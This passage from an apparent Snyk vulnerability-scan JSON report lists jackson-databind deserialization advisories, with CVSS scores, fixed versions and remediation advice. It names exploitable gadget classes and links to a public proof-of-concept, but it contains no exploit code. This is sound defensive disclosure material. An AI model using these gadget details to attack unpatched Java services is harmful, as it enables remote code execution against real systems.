{ + "version": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-02T05:18:36Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-02T05:18:36Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.132894Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559106", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Pedro Sampaio" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.3", + "2.8.11.5", + "2.9.10.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + 
"malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/41b7f9b90149e9d44a65a8261a8deedc7186f6af", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2462", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2469", + "title": "GitHub Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14892", + "title": "RedHat Bugzilla" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:48.813035Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:54.500842Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.772859Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:48.813035Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.500842Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data 
Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). \r\nIt doesn't block `common-configuration` JNDI classes `org.apache.commons.configuration.JNDIConfiguration` and `org.apache.commons.configuration2.JNDIConfiguration`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. 
Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.8.11.5, 2.9.10.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/41b7f9b90149e9d44a65a8261a8deedc7186f6af)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2462)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2469)\n- [RedHat Bugzilla](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14892)\n", + "epssDetails": { + "percentile": "0.73523", + "probability": "0.00392", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14892", + "CVE-2019-14893" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + 
"GHSA-cf6r-3wgc-h863", + "GHSA-qmqc-x3r4-6v39" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-03T08:13:33.357434Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-02T17:09:34Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-02T17:09:34Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.500842Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560762", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": 
"com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/1645efbd392989cf015f459a91c999e59c921b15", + "title": "GitHub Commit (Master)" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2660", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "On Jackson CVE's Blog" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-10673", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:50:14.029596Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:50.167932Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:45.907430Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:14.029596Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:50.167932Z" + } + ], + "description": "## 
Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.caucho.config.types.ResourceRef` (aka `caucho-quercus`).\r\n\r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. 
Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit (Master)](https://github.com/FasterXML/jackson-databind/commit/1645efbd392989cf015f459a91c999e59c921b15)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2660)\n- [On Jackson CVE's Blog](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-10673)\n", + "epssDetails": { + "percentile": "0.81511", + "probability": "0.00775", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10673" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + 
"GHSA-fqwf-pjwf-7vqv" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-19T14:36:02.644920Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-18T22:56:21Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-18T22:56:21Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:50.167932Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560766", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": 
"ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/592872f4235c7f2a3280725278da55544032f72d", + "title": "GitHub Commit (Master)" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2659", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "On Jackson CVEs: Don’t Panic" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:51:25.975313Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:53.920721Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:35.299190Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:25.975313Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:53.920721Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson 
Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory` (aka `aries.transaction.jms`). \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. 
Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit (Master)](https://github.com/FasterXML/jackson-databind/commit/592872f4235c7f2a3280725278da55544032f72d)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2659)\n- [On Jackson CVEs: Don’t Panic](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.81511", + "probability": "0.00775", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10672" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-95cm-88f5-f2c7" + ] + }, + "packageName": 
"com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-19T15:03:20.847507Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-18T22:56:24Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-18T22:56:24Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.920721Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561362", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.6.7.4)", + "[2.7.0,2.7.9.7)", + "[2.8.0,2.8.11.6)", + "[2.9.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.7.9.7", + "2.8.11.6", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + 
"className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2642", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:50:19.998455Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.582959Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:57.137266Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:19.998455Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.582959Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
The package mishandles the interaction between serialization gadgets and typing, related to gadget `javax.swing.JEditorPane`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. 
These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.6, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2642)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.81534", + "probability": "0.00775", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10969" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-758m-v56v-grj4" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-26T16:25:31.113677Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-26T14:55:31Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + 
